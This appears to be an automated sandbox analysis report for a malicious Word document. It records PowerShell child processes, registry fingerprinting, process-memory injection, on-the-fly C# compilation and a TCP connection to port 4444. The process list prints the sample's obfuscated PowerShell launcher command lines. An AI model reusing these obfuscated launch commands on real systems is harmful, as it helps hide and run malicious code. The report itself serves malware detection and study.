Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2552 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2552 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 4924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 4924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4924 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
PID 4924 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
PID 4924 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
PID 2980 wrote to memory of 4160 N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2980 wrote to memory of 4160 N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2980 wrote to memory of 4160 N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4160 wrote to memory of 1020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4160 wrote to memory of 1020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4160 wrote to memory of 1020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /w 1 /C "sv hYq -;sv pjO ec;sv maq ((gv hYq).value.toString()+(gv pjO).value.toString());powershell (gv maq).value.toString() ('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'+'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')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec 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

C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe

"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e 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

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES609E.tmp" "c:\Users\Admin\AppData\Local\Temp\w3caw3ii\CSCBC183396E756464496C727A83D99864.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
N/A 192.168.224.173:4444 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp

Files

memory/2236-0-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-1-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-2-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-3-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-4-0x00007FF85FA0D000-0x00007FF85FA0E000-memory.dmp

memory/2236-5-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-6-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-12-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-11-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-13-0x00007FF81D090000-0x00007FF81D0A0000-memory.dmp

memory/2236-10-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-9-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-8-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-7-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-16-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-17-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-18-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-19-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-20-0x00007FF81D090000-0x00007FF81D0A0000-memory.dmp

memory/2236-15-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-14-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-36-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-35-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2552-37-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2552-39-0x000001A57B770000-0x000001A57B792000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ara10o5y.l1z.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2980-63-0x0000000002890000-0x00000000028C6000-memory.dmp

memory/2980-64-0x0000000005010000-0x0000000005638000-memory.dmp

memory/2980-65-0x0000000004F90000-0x0000000004FB2000-memory.dmp

memory/2980-66-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/2980-68-0x00000000057E0000-0x0000000005846000-memory.dmp

memory/2980-77-0x0000000005850000-0x0000000005BA4000-memory.dmp

memory/2980-78-0x0000000005E80000-0x0000000005E9E000-memory.dmp

memory/2980-79-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

memory/2980-80-0x0000000006260000-0x00000000062A4000-memory.dmp

memory/2980-81-0x00000000077E0000-0x0000000007E5A000-memory.dmp

memory/2980-82-0x0000000006440000-0x000000000645A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.cmdline

MD5 8824831432e97f8fd81516fe67efc454
SHA1 bce55b75a256409418414649cecbaf24b34c41a0
SHA256 76f21d9d0ce5e5cf4880c4e33837dad1219fdbfbd7717eecdbc6c7ffe9271e88
SHA512 8b001cf82ff8ca7fbbf9f2cbcf16abad94109c9b7eb402385853da14272b02767f5e2271dc80e57d5473c62441370baf64fe20190447b0e81c6249e0162a4c6e

\??\c:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.0.cs

MD5 983cad5e58b8e626d0bbb94f162c2530
SHA1 928e5a00d6770e304a4535dd46de98a2674bc6e1
SHA256 566297f4d486eba0ee60cdb68d4e0a3714c985a77a3be4ceeff5449ba11c3c1d
SHA512 1bf465fe68634c242b8493dde11a521d13aa2d95b60ccefc405dc53150d3654a1b699c6cab230d11c5e6655eaa72949040eec739b3125d7f8729bc028dffcda6

\??\c:\Users\Admin\AppData\Local\Temp\w3caw3ii\CSCBC183396E756464496C727A83D99864.TMP

MD5 b15fc986ad99a20ab72cc893caed167d
SHA1 bf51ec176f1c3ab39493973104ff70bb15b57697
SHA256 fc6eac87dfb48572b962ae34a4a83d03225c8b10538ac6100f23a06fdce055e9
SHA512 b8e4585bd3f99a5876ed870983d1c562e90d4c37a778beb8ecb0a5eb0ec88e90221dd25886d51cbaa601122446eb62f588c1f69914d00436d1e3a0495bd45fed

C:\Users\Admin\AppData\Local\Temp\RES609E.tmp

MD5 42fc88e078d1c6242bfded2950e8fc74
SHA1 9b60da3b844f73830367b98ab8ebb38202d1389d
SHA256 f38b5b853259bc0a9933a56ecc5924a5357c748f633d5f7a0d2671676444a8c7
SHA512 a0c28fe00ea5e74463aa1a44b6b15b5fb335dc208a272482c2d22ecd59aa55f99247abbb399e9c9f2e12564f90908acd23e4b0fa86641168d19ad92b74fbfeeb

C:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.dll

MD5 409ba493ca665ab20b3397a400f8e89d
SHA1 985b2dff59164dab67631f8d0266d5bf90ee3459
SHA256 9b6ee04705129bcd2b7c3eec05c1796a2383c60d064112ed0bb6b68e4370a765
SHA512 8363819d3433eacbce1f99fb3f9427c4c31155c1e14260e0693dc649ddf110aa172eeb900fd834badac30dc43678e56680eb670bb521d0eb5205df0fe234f7bc

memory/2980-95-0x0000000007180000-0x0000000007188000-memory.dmp

memory/2236-98-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-116-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-115-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-114-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-113-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-117-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2980-120-0x0000000007330000-0x00000000073A6000-memory.dmp

memory/2552-122-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp